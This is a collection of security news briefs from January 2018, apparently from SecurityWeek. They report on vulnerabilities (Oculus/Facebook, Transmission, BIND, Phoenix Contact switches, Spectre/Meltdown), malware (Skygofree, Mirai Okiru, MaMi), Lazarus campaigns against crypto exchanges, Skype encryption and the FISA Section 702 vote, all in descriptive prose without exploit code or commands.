“The team observed cases where infrastructure (i.e., routers and switches) was in company space but accessible to staff with no need to have physical access. Other cases included ICS components in public areas without any physical restrictions (i.e., locked doors or enclosures) to prevent access from a passerby. Some sites did not have locked doors to the operations plant, which would allow anyone to walk in and potentially have access to control system components,” ICS-CERT explained.


Flaws Allowed Facebook Account Hacking via Oculus App
17.1.2018 securityweek
Social

Facebook recently patched a couple of vulnerabilities that could have been exploited by malicious hackers to hijack accounts by abusing integration with the Oculus virtual reality headset.

Facebook announced the acquisition of Oculus VR back in July 2014 and added Oculus assets to its bug bounty program a few weeks later. Several vulnerabilities have been found in Oculus services since, including a series of flaws that earned a researcher $25,000.

In October, web security consultant Josip Franjkoviæ decided to analyze the Oculus application for Windows, which includes social features that allow users to connect their Facebook account.

Franjkovic discovered that a malicious actor could have used specially crafted GraphQL queries to connect a targeted user’s Facebook account to the attacker’s Oculus account. GraphQL is a query language created by Facebook in 2012 and later released to the public.

According to the researcher, a specially crafted query allowed an attacker to obtain the victim’s access token, which under normal circumstances should not be accessible to third-party apps, and use it to take control of their Facebook account.

Franjkovic demonstrated an account takeover method by using a specially crafted query to add a new mobile phone number to the targeted account and then leveraging that number to reset the victim’s password.

The vulnerability was reported to Facebook on October 24 and a temporary fix, which involved disabling the facebook_login_sso endpoint, was implemented on the same day. A permanent patch was rolled out on October 30.

A few weeks later, the expert discovered a login cross-site request forgery (CSRF) flaw that could have been exploited to bypass Facebook’s patch.

This second flaw was reported to Facebook on November 18 and again the facebook_login_sso endpoint was disabled on the same day as a temporary fix. A complete patch was implemented roughly three weeks later.

The researcher has not disclosed the amount of money he earned from Facebook for finding the vulnerabilities, but he told SecurityWeek that the social media giant classified the issues as critical and he was happy with the reward he received.

Facebook revealed last week that it had paid a total of $880,000 in bug bounties in 2017, with an average of roughly $1,900 per submission.

Technical details for the vulnerabilities can be found on Franjkovic’s blog. In the past years, the expert reported several vulnerabilities to Facebook, including ones that could be exploited to hijack accounts.


BlackBerry Launches Security Product for Automotive, Other Industries
17.1.2018 securityweek IT

BlackBerry announced on Monday the launch of Jarvis, a new cybersecurity service designed to help companies in the automotive and other sectors find vulnerabilities in their software.

Jarvis has been described by BlackBerry as a cloud-based static binary code analysis software-as-a-service (SaaS) product. The tool is currently used by automakers, including Britain’s largest car maker, Jaguar Land Rover, but BlackBerry says it is ideal for other types of organizations as well, including in the healthcare, aerospace, defense, and industrial automation sectors.

Modern cars use hundreds of software components, including many provided by third-party vendors across several tiers. While this approach has some advantages, it also increases the chances of vulnerabilities making it into the software somewhere along the supply chain.BlackBerry launches Jarvis code scanning service

Jarvis aims to address this issue by scanning code and offering actionable information within minutes. In addition to finding vulnerabilities, the service also helps ensure compliance with various standards.

BlackBerry claims the new product performs tasks that would require a large number of experts and a lot of time, which should help companies save money. The tool can be integrated with existing development tools and APIs.

“Connected and autonomous vehicles require some of the most complex software ever developed, creating a significant challenge for automakers who must ensure the code complies with industry and manufacturer-specific standards while simultaneously battle-hardening a very large and tempting attack surface for cybercriminals,” said John Chen, executive chairman and CEO of BlackBerry.

“Jarvis is a game-changer for OEMs because for the first time they have a complete, consistent, and near real-time view into the security posture of a vehicle's entire code base along with the insights and deep learning needed to predict and fix vulnerabilities, ensure compliance, and remain a step ahead of bad actors,” Chen added.

Jarvis is an online tool that can be used by companies as a pay-as-you-go service. The product can be customized for each organization’s needs and their specific supply chain, allowing them to scan code at every stage of the development process.


Kaspersky Discovers Powerful Mobile Spyware
17.1.2018 securityweek Android

Kaspersky Lab has shared details of a sophisticated, multi-stage mobile spyware that gives attackers the ability to take over an infected Android device, with advanced features that have never been seen before in other mobile threats.

Named Skygofree, the mobile implant has been active since 2014 and has the ability to record nearby conversations and noise when an infected device enters a specified location.

Other advanced functions that have never been seen before include using Android’s Accessibility Services to access WhatsApp messages and the ability to connect an infected device to Wi-Fi networks controlled by the attackers.

“The implant carries multiple exploits for root access and is also capable of taking pictures and videos, seizing call records, SMS, geolocation, calendar events and business-related information stored in the device’s memory,” Kaspersky explained.

Furthermore, a special feature enables it to circumvent a battery-saving technique used on China-made Huawei devices by adding itself to the list of ‘protected apps’ so that it is not switched off automatically when the screen is off.

"Due to this feature, it is clear that the developers paid special attention to the work of the implant on Huawei devices," Kaspersky's researchers noted.

Designed for targeted cyber-surveillance, Kaspersky said the malware could be an offensive security product used for law enforcement purposes, similar to products offered by Hacking Team, a controversial Italy-based company that develops and sells surveillance technology to governments around the world.

Kaspersky did not provide statistics on the number of Android devices that may have been infected, but the number appears to be relatively small. There are “several infected individuals,” all located in Italy, Kaspersky said.

“Given the artefacts we discovered in the malware code and our analysis of the infrastructure, we have a high level of confidence that the developer behind the Skygofree implants is an Italian IT company that offers surveillance solutions, rather like HackingTeam,” said Alexey Firsh, Malware Analyst, Targeted Attacks Research, Kaspersky Lab.

The operators used spoofed landing pages that mimic the sites of mobile operators for spreading the implant, and Kaspersky’s researchers found 48 different commands that can be leveraged by the attackers.

Kaspersky provided technical analysis on Skygofree in an associated blog post, including an overview of the various commands, along with details on a number of modules that target computers running Microsoft Windows.

“High end mobile malware is very difficult to identify and block and the developers behind Skygofree have clearly used this to their advantage: creating and evolving an implant that can spy extensively on targets without arousing suspicion,” Firsh said.

The attacks are ongoing and the most recent domain was registered in October 2017.


North Korean Hackers Prep Attacks Against Cryptocurrency Exchanges: Report
17.1.2018 securityweek BigBrothers

Researchers Say a North Korea-Linked Hacking Campaign is Ready to Go Against South Korean Cryptocurrency Exchanges

North Korean hackers, loosely categorized as the Lazarus Group, have continued their attacks against South Korean interests, with particular emphasis on cryptocurrency exchanges.

Recorded Future has published details of a campaign it discovered in late 2017, which does not yet appear to be active. This may be in recognition of, or because of, the current discussions between North and South over North Korea's potential involvement in South Korea's Winter Olympics being held in Pyeongchang in February -- or it could simply be that the campaign development has not yet been put in action.

Recorded Future said they discovered a spear-phishing campaign that uses the CVE-2017-8291 Ghostscript vulnerability triggered from within a Hangul Word Processor (popular in South Korea) document.

For now, the bilateral discussions between North and South seem to be fruitful. It is reported that North Korea will send a 140-member orchestra to the Games, and there are ongoing discussions over the two countries fielding a joint women's hockey team. Nevertheless, Recorded Future researcher Priscilla Moriuchi told SecurityWeek that the campaign is in place and could be easily invoked.

Earlier this month, McAfee described a separate attack against North Korean defectors from a group -- almost certainly North Korean -- that does not appear to be related to any known cybercrime group.

Recorded Future notes that the techniques used in that attack "are unusual for the Lazarus Group. These include leveraging PowerShell, HTA, JavaScript, and Python, none of which are common in Lazarus operations over the last eight years." This new campaign, however, "showcases a clear use of Lazarus TTPs to target cryptocurrency exchanges and social institutions in South Korea."

The Lazarus targets are users of the Coinlink cryptocurrency exchange, other exchanges, and a group known as 'Friends of MOFA (Ministry of Foreign Affairs)'.

The cryptocurrency target is typical Lazarus. "Beginning in 2016," notes Recorded Future, "researchers discovered a shift in North Korean operations toward attacks against financial institutions designed to steal money and generate funds for the Kim regime." Lazarus is believed to be behind the 2016 attacks on the SWIFT global banking network, including the theft of $81 million from the Bangladesh central bank in February 2016.

In December 2017, the South Korean Youbit cryptocurrency exchange went bankrupt following its second hack of the year. In the first attack it lost 4000 bitcoin or around 40% of its reserves (around $5 million at the time), and a further 17% of its assets in the December breach. Some reports suggest that the attacks were undertaken by BlueNoroff, a sub-group of Lazarus.

South Korean exchanges have been strengthening their network defenses, while the government has been considering regulations to tighten control over cryptocurrencies. One mooted option has been the shutdown of all virtual cryptocurrency exchanges, although a statement from the Office for Government Policy Coordination on Monday downplayed a comment from Justice Minister Park Sang-ki last week. The Justice Minister's statement suggested the government is already working on legislation to ban virtual exchanges in the country. The current view is that a ban is not imminent, although stricter regulation is likely.

Whatever happens, hacking South Korean cryptocurrency exchanges will become more difficult in the future. "The majority of North Korean cryptocurrency operations have targeted South Korean users and exchanges, but we expect this trend to change in 2018. We assess that as South Korea responds to these attempted thefts by increasing security, they will become harder targets, forcing North Korean actors to look to exchanges and users in other countries as well."

Noticeably, Recorded Future warns that although this campaign and toolset are specific to the Hangul Word Processor, the actul vulnerability it exploits is not. "This vulnerability is for the Ghostscript suite and affects a wide range of products, and while this particular version is triggered from within an embedded PostScript in an HWP document, it could easily be adapted to other software."

"The main targets and victims of North Korean cryptocurrency operations in 2017 were South Korean," Moriuchi told SecurityWeek. "As a result of that targeting, the South Korean regulators are attempting to impose stricter financial controls on exchanges, and the exchanges are also implementing stricter security measures both for their users and within their networks. We believe that these factors will lead North Korea -- which is clearly invested in cryptocurrency operations -- to pursue other targets in other countries because the South Korean targets are becoming harder to get at."

This campaign is delivered by spear-phishing emails. Four separate lures have been identified: one aimed at users of Coinlink; two that appear to be resumes stolen from two genuine South Korean computer scientists who work at cryptocurrency exchanges; and one lifted from a blog run by the Friends of MOFA. All of the lure documents were created between mid-October and late November.

"This campaign relies on multiple payloads fashioned out of the Destover infostealer code to collect information about the victim system and exfiltrate files," reports Recorded Future. Destover further implicates Lazarus in the campaign. It was used in the Sony Pictures Entertainment attack in 2014, the Polish banking attacks in January 2017, and in the first WannaCry victim discovered by Symantec.

Recorded Future does not believe that any improving relations between North and South Korea will stop Lazarus targeting South Korea. The campaign could kick off at any time. But the suggestion is that as attacking South Korean exchanges becomes more difficult and less fruitful, the same attack could relatively easily be re-engineered for different exchanges in different countries.


Code Execution Flaw Found in Transmission BitTorrent App
17.1.2018 securityweek
Vulnerebility

Google Project Zero researcher Tavis Ormandy has discovered a critical remote code execution vulnerability in the Transmission BitTorrent client. The expert has proposed a fix, but it has yet to be implemented by the application’s developers.

Transmission is a popular open source BitTorrent client that is available for Windows, Mac and Linux. Ormandy has been analyzing several popular torrent clients and found that Transmission has a serious vulnerability.

According to the researcher, an attacker can execute code on a system running Transmission by getting the targeted user to access a specially crafted website.

“The Transmission bittorrent client uses a client/server architecture, the user interface is the client and a daemon runs in the background managing the downloading, seeding, etc,” Ormandy explained in an advisory. “Clients interact with the daemon using JSON RPC requests to a web server listening on port 9091. By default, the daemon will only accept requests from localhost.”

However, the expert showed that the localhost requirement can be bypassed using a type of attack called “DNS rebinding.”

The attacker sets up a website and adds an iframe that points to a subdomain of that site. The DNS server is configured to respond alternatively with an address controlled by the attacker and localhost (127.0.0.1), with a short time to live (TTL). When the victim visits the malicious website, the browser resolves to the attacker-controlled DNS server and then switches to localhost.

“Exploitation is simple, you could set script-torrent-done-enabled and run any command, or set download-dir to /home/user/ and then upload a torrent for ‘.bashrc’,” Ormandy explained.

The expert says he has successfully tested his proof-of-concept (PoC) exploit with Chrome and Firefox running on Windows and Linux.

The vulnerability, tracked as CVE-2018-5702, was reported to Transmission developers on November 30, and Ormandy even provided a fix the next day. However, an official patch still has not been released, which the researcher says is highly unusual for open source projects.

Ormandy pressed the developers and last week they agreed to make his patch public on GitHub so that at least downstream distributions such as Debian and Fedora can roll out their own patches. It’s unclear when an official patch will become available, but it should be included in the next 2.93 release.

Transmission developers pointed out that the macOS and Linux versions are only vulnerable if remote access is enabled; the feature is disabled by default.

Sebastian Lekies, who also works for Google, said he reported the same vulnerability to Transmission developers five years ago, but never heard back from them.

Back in 2016, hackers broke into the Transmission website and planted a malicious installer designed to deliver a new OS X ransomware.


Mirai Variant Targets ARC CPU-Based Devices
17.1.2018 securityweek BotNet

A newly discovered variant of the Mirai Internet of Things (IoT) botnet is targeting devices with ARC (Argonaut RISC Core) embedded processors, researchers warn.

Dubbed Okiru, the new malware variant appears to be different from the Satori botnet, although the latter was also called Okiru by its author. Security researchers analyzing the new threat have discovered multiple differences between the two Mirai versions, aside from the targeting of the ARC architecture.

Originally designed by ARC International, the ARC processors are 32-bit CPUs widely used in system on chip (SOC) devices for storage, home, mobile, automotive, and IoT applications. Each year, over 1.5 billion devices are shipped with ARC processors inside.

Mirai Okiru represents the very first known malware targeting ARC processors, independent security researcher Odisseus, who analyzed the threat, notes.

The botnet was discovered by @unixfreaxjp from malwaremustdie.org, the security researcher who spotted the first Mirai variant in August 2016. In a post on reddit, the researcher explained that, although distributed denial of service (DDoS) is the main purpose of the last two Mirai versions, they are very different.

One of the characteristics that sets them apart is the configuration, which in Okiru is encrypted in two parts with telnet bombardment password encrypted. Satori doesn’t split it in two and doesn't encrypt brute default passwords either. Moreover, the new malware variant can use up to 114 credentials for telnet attack, while Satori uses a different and shorter database.

The researcher also explains that Okiru seems to lack the "TSource Engine Query" common Distributed "Reflective" (DRDoS) attack function via random UDP that Satori has. The two also have different infection follow up commands written in their configurations and show differences in usage of watchdog.

Okiru was found to have four types of router attack exploit code hard coded in it, none of which is found in Satori. Furthermore, there are small embedded ELF Trojan downloaders in Satori, which are used to download other architecture binaries (these were coded differently compared to Okiru ones).

Last week, when the researchers first noticed Okiru’s attacks, the malware enjoyed low detection in VirusTotal. Thus, and because the new threat is targeting devices that haven’t been hit by malware previously, researchers expect an uptick in Mirai infections.

It is also clear that the actor behind the botnet is actively following reports on the malware. Within minutes after ENISA (European Union Agency for Network and Information Security) Threat Landscape Stakeholder Group member Pierluigi Paganini wrote about Okiru, the website was hit with a DDoS attack that lasted over an hour, Italy’s CERT-PA revealed (translated).


DNS Servers Crash Due to BIND Security Flaw
17.1.2018 securityweek
Vulnerebility

Updates released by the Internet Systems Consortium (ISC) for BIND patch a remotely exploitable security flaw that has caused some DNS servers to crash.

The high severity vulnerability, tracked as CVE-2017-3145, is caused by a use-after-free bug that can lead to an assertion failure and crash of the BIND name server (named) process.

“BIND was improperly sequencing cleanup operations on upstream recursion fetch contexts, leading in some cases to a use-after-free error that can trigger an assertion failure and crash in named,” ISC said in an advisory.

While there is no evidence that this vulnerability has been exploited in malicious attacks, ISC says crashes caused by the bug have been reported by “multiple parties.” The impacted systems act as DNSSEC validating resolvers, and temporarily disabling DNSSEC validation can be used as a workaround.

The vulnerability, discovered by Jayachandran Palanisamy of Cygate AB, affects BIND versions 9.9.9-P8 to 9.9.11, 9.10.4-P8 to 9.10.6, 9.11.0-P5 to 9.11.2, 9.9.9-S10 to 9.9.11-S1, 9.10.5-S1 to 9.10.6-S1, and 9.12.0a1 to 9.12.0rc1. It has been patched with the release of BIND 9.9.11-P1, 9.10.6-P1, 9.11.2-P1 and 9.12.0rc2.

“Addresses could be referenced after being freed during resolver processing, causing an assertion failure. The chances of this happening were remote, but the introduction of a delay in resolution increased them. (The delay will be addressed in an upcoming maintenance release.),” ISC explained.

The organization has also informed users of CVE-2017-3144, a medium severity DHCP vulnerability affecting versions 4.1.0 to 4.1-ESV-R15, 4.2.0 to 4.2.8, and 4.3.0 to 4.3.6.

“By intentionally exploiting this vulnerability an attacker who is permitted to establish connections to the OMAPI control port can exhaust the pool of socket descriptors available to the DHCP server,” ISC explained.

“Once exhausted, the server will not accept additional connections, potentially denying access to legitimate connections from the server operator. While the server will continue to receive and service DHCP client requests, the operator can be blocked from the ability to use OMAPI to control server state, add new lease reservations, etc.,” it added.

ISC has developed a patch and it plans on adding it to a future maintenance release of DHCP. In the meantime, users can protect themselves against potential attacks by disallowing access to the OMAPI control port from unauthorized clients. Alternatively, organizations can obtain the patch from ISC and integrate it into their own code.


Serious Flaws Found in Phoenix Contact Industrial Switches
17.1.2018 securityweek
Vulnerebility

Vulnerabilities in Phoenix Contact Industrial Switches Can Allow Hackers to Disrupt Operations

Researchers have discovered potentially serious vulnerabilities in industrial switches made by Phoenix Contact, a Germany-based company that specializes in industrial automation, connectivity and interface solutions.

According to advisories published last week by ICS-CERT and its German counterpart CERT@VDE, Phoenix Contact’s FL SWITCH industrial ethernet switches are affected by authentication bypass and information exposure flaws. Ilya Karpov and Evgeniy Druzhinin of Positive Technologies have been credited for reporting the flaws.

Vulnerabilities%20found%20in%20Phoenix%20Contact%20industrial%20switches

The security holes affect 3xxx, 4xxx and 48xx series switches running firmware versions 1.0 through 1.32. The vendor addressed the weaknesses in version 1.33, but researchers told SecurityWeek that it took the company roughly 160 days to release patches, which they haven’t been able to verify.Vulnerabilities found in Phoenix Contact industrial switches

The more serious of the flaws is tracked as CVE-2017-16743 and it has been assigned a CVSS score of 9.8, which puts it in the “critical severity” category. The vulnerability allows a remote, unauthenticated attacker to bypass authentication and gain administrative access to the targeted device by sending it specially crafted HTTP requests.

The second flaw, CVE-2017-16741, has been rated “medium severity” and it allows a remote and unauthenticated attacker to abuse a device’s Monitor mode in order to read diagnostics information. Firmware version 1.33 allows users to disable the Monitor mode.

Positive Technologies researchers told SecurityWeek that attackers can exploit the vulnerabilities to gain full control of a targeted switch and leverage it to interrupt operations in the ICS network, which can have serious consequences.

While some Phoenix Contact products do appear to be connected directly to the Internet, experts have not found any of its industrial switches on search engines such as Shodan and Censys. Positive Technologies says these industrial switches are typically used for internal PLC networks.

“This does not mean that such devices could not be found and accessed from the internet, it only means that we were not able to find such cases using shodan.io and censys.io,” researchers said.


Device Manufacturers Working on BIOS Updates to Patch CPU Flaws
17.1.2018 securityweek
Vulnerebility

Acer, Asus, Dell, Fujitsu, HP, IBM, Lenovo, Panasonic, Toshiba and other device manufacturers have started releasing BIOS updates that should patch the recently disclosed Spectre and Meltdown vulnerabilities.

The flaws exploited by the Meltdown and Spectre attacks, tracked as CVE-2017-5715, CVE-2017-5753and CVE-2017-5754, allow malicious applications to bypass memory isolation mechanisms and access sensitive data. Billions of PCs, servers, smartphones and tablets using processors from Intel, AMD, ARM, IBM and Qualcomm are affected.

Computer manufacturers release BIOS updates to patch Meltdown and Spectre

Fortunately, tech companies have already started releasing patches and workarounds designed to prevent attacks. Unfortunately, some of the mitigations can introduce significant performance penalties for certain types of operations.

Intel has released patches, including microcode updates, for many of its processors, and AMD has promised to do the same. Intel has provided the fixes to system manufacturers and they have already released or are in the process of releasing BIOS updates.

Acer

Acer has informed customers that the Spectre and Meltdown vulnerabilities affect many of its desktop, notebook and server products. It’s unclear when BIOS updates will become available for a majority of the impacted devices, but the company has set a target date of March 2018 for server updates.

The list of impacted products includes Aspire, Extensa, Gateway, imd, Predator, Revo, ShangQi, Veriton and Wenxiang desktops; Aspire, Extensa, Gateway, Nitro, Packard Bell EasyNote, Spin, Swift, Switch, and TravelMate notebooks; and Altos, AR, AT, AW and Veriton servers.

Asus

Asus is also working on releasing BIOS updates. The company expects to release patches for affected laptops, desktops and mini PCs by the end of the month.

Asus has published a separate security advisory for motherboards that support Intel processors vulnerable to Meltdown and Spectre attacks.

Dell

Dell has already started releasing BIOS updates for affected Alienware, Inspiron, Edge Gateway, ChengMing, Enterprise Server, Latitude, OptiPlex, Precision, Vostro, Venue and XPS products. The vendor expects many more updates to become available later this month.

Dell has published a separate advisory for EMC products, including PowerEdge and Datacenter Scalable Solutions (DSS). Updates are available for many of the impacted systems.

Fujitsu

Fujitsu has informed customers that many of its OEM mainboards, Esprimo PCs, Celsius workstations, Futuro thin clients, Stylistic, Lifebook and Celsius notebooks, Celvin storage devices, Primergy and Primequest servers, Sparc servers, and retail products are affected. However, BIOS updates are available only for a handful of them.

Intel

Intel has started integrating the processor microcode fixes into BIOS updates for NUC, Compute Stick and Compute Card mini PCs. Updates are available for many of the products and more are expected to be released later this month.

The company is also working on updates for Server Board and Visual Compute Accelerator products, but only two BIOS updates have been released to date. Intel has not provided an estimate on when more updates should become available.

HP

HP has started releasing BIOS updates that patch the Meltdown and Spectre vulnerabilities for commercial workstations; commercial desktops, notebooks and retail PoS devices; and consumer desktops and notebooks.

Updates for the remaining systems are expected to become available later this month or in early February.

Lenovo

Lenovo says many of its desktop, IdeaPad, ThinkStation, Converged and ThinkAgile, storage, Hyperscale, ThinkServer, ThinkSystem, System X, network switch, and server management products are affected.

Lenovo has released BIOS updates for many of its solutions, and the company has also advised users to update their operating system and NVIDIA drivers to ensure that they are protected against Meltdown and Spectre attacks.

Gigabyte and MSI motherboards

Gigabyte has a long list of impacted motherboards, including the Z370, X299, B250, H110, Z270, H270, Q270, Z170, B150 and H170 families. The company has promised to start releasing BIOS updates in the next few days, with updates for a majority of systems expected to become available over the next few weeks.

MSI has released BIOS updates for Z370, Z270, H270, B250, Z170, H170, B150, H110, X299 and X99 motherboards. Patches are expected to become available for other devices “very soon.”

Others

IBM has released firmware patches for some of its POWER processors. Fixes for its AIX and IBM i operating systems are expected to become available in mid-February.

Getac Technology, a Taiwan-based firm that makes rugged notebook, tablet and handheld computers, has promised to release BIOS updates by the end of this month.

Toshiba has published a list of affected Qosmio, Satellite, Portege, Tecra, Chromebook, Kirabook, AIO, Regza, Mini Notebook, Encore, Excite and dynaPad devices, but it has yet to release any updates. Some of the fixes are expected later this month.

Data center hardware provider QCT says it has integrated the microcode patches into a majority of its recent products. Super Micro has also issued fixes for many of its single, dual and multi-processor systems; SuperBlade, MicroBlade and MicroCloud products; and embedded, workstation and desktop systems.

Computing and storage solutions provider Wiwynn has released BIOS updates for its SV300G3, SV7200G3, SV5100G3 and SV5200G3 products, and more are expected to become available over the next few weeks.

Panasonic hopes to release updates for its laptops and tablets over the next few months.


Islamic State Retreats Online to 'Virtual Caliphate'
17.1.2018 securityweek CyberCrime

On the brink of defeat in Iraq and Syria, the Islamic State group has been taking refuge in its "virtual caliphate" -- but even online, experts say it is in decline.

Back in 2015, when the jihadists held territory the size of Italy, they also commanded a huge digital presence, flooding the web with slick propaganda lionising their fighters and romanticising life under their rule.

Today, with many of the top IS leaders either dead or on the run, what remains of the group's once-sophisticated propaganda machine is also a shadow of its former self.

Their media centres destroyed, remaining propagandists find themselves struggling to maintain an internet connection while battling surveillance from international intelligence services.

The jihadist group is less and less vocal on the web, largely leaving supporters whom it cannot control to speak in its name.

"It's almost as if someone has pressed the mute button on the Islamic State," said Charlie Winter, a researcher at King's College London who has been studying IS communications for years.

Between November 8 and 9 the group even went completely silent for a full 24 hours in what Winter said was an "unprecedented" break from social media.

In 2015, when IS was ruling over roughly seven million people in Iraq and Syria, its propagandists produced "content from 38 different media offices from West Africa to Afghanistan", Winter said.

But by December, more than three quarters of these outlets had been "almost totally silenced," he added.

Albert Ford, a researcher at US think-tank New America who has studied the exodus of foreign fighters to join IS, also said the group's media output was "falling off considerably".

"Fewer places to get information, fewer ways to upload it," he said.

- Pushed to the 'dark web' -

Back in March as Iraqi forces were ousting IS from their long-held bastion Mosul, an AFP journalist was able to pick through the wreckage of what was once a jihadist media centre.

Between the burnt walls of the villa in an upscale part of the city were the remains of computers, printers and broadcasting equipment.

In the months before and since, the US-led military coalition fighting IS has repeatedly announced the deaths of senior IS communications officers, usually in air strikes.

Among them was the top strategist and spokesman Abu Mohamed al-Adnani, killed in a US strike in northern Syria in August 2016.

These days IS propagandists mostly use the web to encourage supporters to launch attacks on their own initiative, with the much-weakened group unable to play a direct hand in organising them.

These calls are often issued via the "deep web", a heavily encrypted part of the internet which is almost impossible to regulate, or the Telegram app.

Winter said he had seen a trend emerging of posts seeking to cultivate a sense of nostalgia among supporters for the height of the group's power.

By portraying events three years ago a "golden age" stolen by "the enemies of Islam", IS is hoping to convince new recruits that such times could come again if they join the cause, Winter said.

Bruce Hoffman, a terrorism specialist at Georgetown University in Washington, said the principal danger of IS now lies in what he calls "enabled attackers".

A jihadist recruit such as this would have "no previous ties to terrorist organisations," Hoffman said.

"But he is furnished very specific targeting instructions and intelligence in order to better facilitate and ensure the success of his attack."

Such wannabe jihadists need look no further than the internet for abundant advice that has been available online for years -- and will merely pop up again after any attempt to remove it.


'MaMi' Mac Malware Hijacks DNS Settings
17.1.2018 securityweek Apple

Researcher Patrick Wardle has analyzed what seems to be a new piece of malware designed to hijack DNS settings on macOS devices. The threat has other capabilities as well, but they do not appear to be active.

The malware, dubbed OSX/MaMi by Wardle based on a core class named “SBMaMiSettings,” is currently only detected – at least based on its signature – by ESET and Ikarus products as OSX/DNSChanger.A and Trojan.OSX.DNSChanger. However, other vendors will likely create signatures for the threat in the upcoming hours and days.

The researcher obtained a sample of MaMi after a user reported on the Malwarebytes forums that a teacher’s Mac had been infected. The user reported that the DNS servers on the compromised system were set to 82.163.143.135 and 82.163.142.137, and they kept changing back after being removed.

Wardle has not been able to determine how the malware is being distributed, but he has found it on several websites. The expert believes the threat has likely been delivered via email, fake security alerts and pop-ups on websites, or social engineering attacks.

The sample analyzed by the researcher acts as a DNS hijacker, but it also contains code for taking screenshots, simulating mouse events, downloading and uploading files, and executing commands.

The malware does not appear to execute any of these functions, but Wardle says it’s possible that they require some attacker-supplied input or other preconditions that his virtual machine may not have met. The researcher says he will continue to investigate.

Once it infects the system, the malware invokes the security tool and uses it to install a new certificate obtained from a remote location.

“OSX/MaMi isn't particular advanced - but does alter infected systems in rather nasty and persistent ways,” Wardle explained. “By installing a new root certificate and hijacking the DNS servers, the attackers can perform a variety of nefarious actions such as man-in-the-middle'ing traffic (perhaps to steal credentials, or inject ads).”

The easiest way to determine if a macOS system is infected with the MaMi malware is to check DNS settings – the threat is present if the server is set to 82.163.143.135 and 82.163.142.137. The malware does not appear to be designed to target Windows devices.

The most well known DNS-changer malware is DNSChanger, a threat that made rounds in the years leading up to 2011 and which changed DNS settings as part of clickjacking and ad replacement fraud schemes. DNSChanger affected both Windows and OS X machines, and millions of devices worldwide were at risk of losing Internet connectivity after authorities took down its infrastructure.


Microsoft Brings End-to-End Encryption to Skype
17.1.2018 securityweek
Social

Microsoft this week announced that end-to-end encrypted communications are now available for preview to Skype insiders.

Called Private Conversations, the newly introduced feature secures both text chat messages and audio calls, Microsoft Program Manager Ellen Kilbourne revealed.

Furthermore, end-to-end encryption is also applied to any files users send to their conversational partners, including images, audio files, and videos. Not only will the contents of these conversations be hidden in the chat list, but they won’t appear in notifications either, to keep user’s information private.

Private Conversations, Kilbourne explains in a post, is using the industry standard Signal Protocol by Open Whisper Systems. The protocol is already providing end-to-end encryption to users of popular messaging applications such as Signal, WhatsApp, and Facebook Messenger.

Users enrolled in Microsoft’s Skype Insider program can already test the new feature by selecting “New Private Conversation” from the compose menu or from the recipient’s profile. As soon as the recipient has accepted the invitation to a private chat, all calls and messages in that conversation will be encrypted end-to-end, until they choose to end it.

Participation in a private conversation will be available from a single device at a time. Skype users will have the possibility to switch the conversation to any of their devices, but exchanged messages are tied to the device being used at the time.

During the preview period, private conversations will be available only to Skype Insiders running the latest version of the application. The chats are also limited to one-to-one conversations, Kilbourne explains.

The Private Conversations feature is currently available to Skype Insiders using Skype version 8.13.76.8 for iOS, Android, Linux, Mac, and Windows Desktop.


Facebook Paid $880,000 in Bug Bounties in 2017
17.1.2018 securityweek
Social

Facebook received over 12,000 vulnerability submissions in 2017 and ended up paying $880,000 in bug bounties to security researchers.

Of the large number of received submissions, however, just over 400 reports were found valid during the bug bounty program’s sixth year. Last year, Facebook also paid larger bounties to the submitting researchers, as the average reward per submission increased to almost $1,900, up from $1,675 in 2016.

The number of security researchers participating in the company’s bug bounty program also increased, Jack Whitton, Security Engineer with Facebook's Product Security team, explains in a blog post. 32% of the researchers who received a reward last year submitted for the first time in 2017.

The largest bounty the company has paid to date is a $40,000 reward for ImageTragick, a remote code execution vulnerability introduced by the ImageMagick image processing suite. Last year, the company also paid a $10,000 bounty for a critical vulnerability that could result in deleting any photo from the social media network.

The largest number of valid submissions in 2017, Facebook says, came out of India. The United States ended up on the second position, followed by Trinidad & Tobago in the third place.

Facebook acknowledged more than 100 researchers as part of the bug bounty program in 2017.

“Going forward, we are going to take a number of things into consideration: dollar amount, submission validity, and more. We’re doing this to continue to encourage high-quality submissions, and we will be offering new perks to our top participants such as swag and prizes, access to exclusive events and new features,” Whitton explains.

He also reveals that Facebook is planning on investing more resources into getting more timely responses and payments to researchers in 2018.

Researchers interested in submitting reports as part of Facebook’s bug bounty program are encouraged to follow the best practices the company is listing at facebook.com/whitehat/resources.

“After celebrating our 6th anniversary, we paid out over $880,000 to researchers last year, bringing our total paid out to over $6,300,000,” Whitton says.

Facebook launched its bug bounty program in 2011 and paid over $5 million to researchers by October 2016.


US House Passes Crucial Spying Law
17.1.2018 securityweek CyberSpy

The US House of Representatives passed a crucial surveillance law Thursday that reinforced the ability of the country's spy agencies to intercept and make use of Americans' private communications.

The national security establishment saw the reauthorization of the expiring Section 702 of the Foreign Intelligence Surveillance Act as essential, warning that they would not be able to detect terror plots without it.

But rights groups and libertarian-leaning politicians of both the Democratic and Republican parties saw the bill's passage as a blow, especially since former National Security Agency contractor Edward Snowden revealed in 2013 that the NSA was using it to vacuum up massive amounts of data on Americans.

Many had hoped the renewal would strengthen protections against invasive electronic wiretapping and social media monitoring of Americans by the NSA, the country's powerful electronic espionage body, and the Federal Bureau of Investigation.

- Trump tweets stir confusion -

The House's vote for the bill came after President Trump himself sent mixed messages of his own views, tweeting Thursday morning his opposition only to make an abrupt U-turn.

In an initial tweet he said the section 702 provision had been used by the Obama administration to "so badly surveil and abuse the Trump campaign," suggesting he was opposed to the bill.

More than an hour later, he reversed himself, saying "today's vote is about foreign surveillance of foreign bad guys on foreign land. We need it!"

While nearly all lawmakers agree that 702 is an essential tool for US intelligence to safeguard national security, the bill passed the House by 256-164, showing the level of opposition to the powers it gives US spies and law enforcement. The no votes included 45 Republicans.

"The House-passed bill does absolutely nothing to defend the vast majority of law-abiding Americans from warrantless searches, and in many ways it expands the federal government's ability to spy on Americans. A concerted campaign of fear-mongering and misinformation pushed this flawed bill over the line," said Senator Ron Wyden, one of the most vocal critics of the law.

- Post-9/11 law -

Section 702 of the FISA law was passed in 2008 after the Bush administration was shown to have allowed the then-illegal surveillance of telephone and online communications of US citizens and residents in the wake of the September 11, 2001 terror attacks.

Amid concerns it gave the government too much power to spy on citizens, the statute was given a five-year limit, and was renewed in 2012.

It allows the NSA and FBI, in their surveillance on foreign targets outside of the country for national security purposes, to also collect and hold communications by US citizens, so-called incidental collection.

It also permits the CIA and FBI to search that material, which includes social media postings, in the course of criminal investigations.

The NSA and FBI have downplayed their collection and use of the materials on Americans.

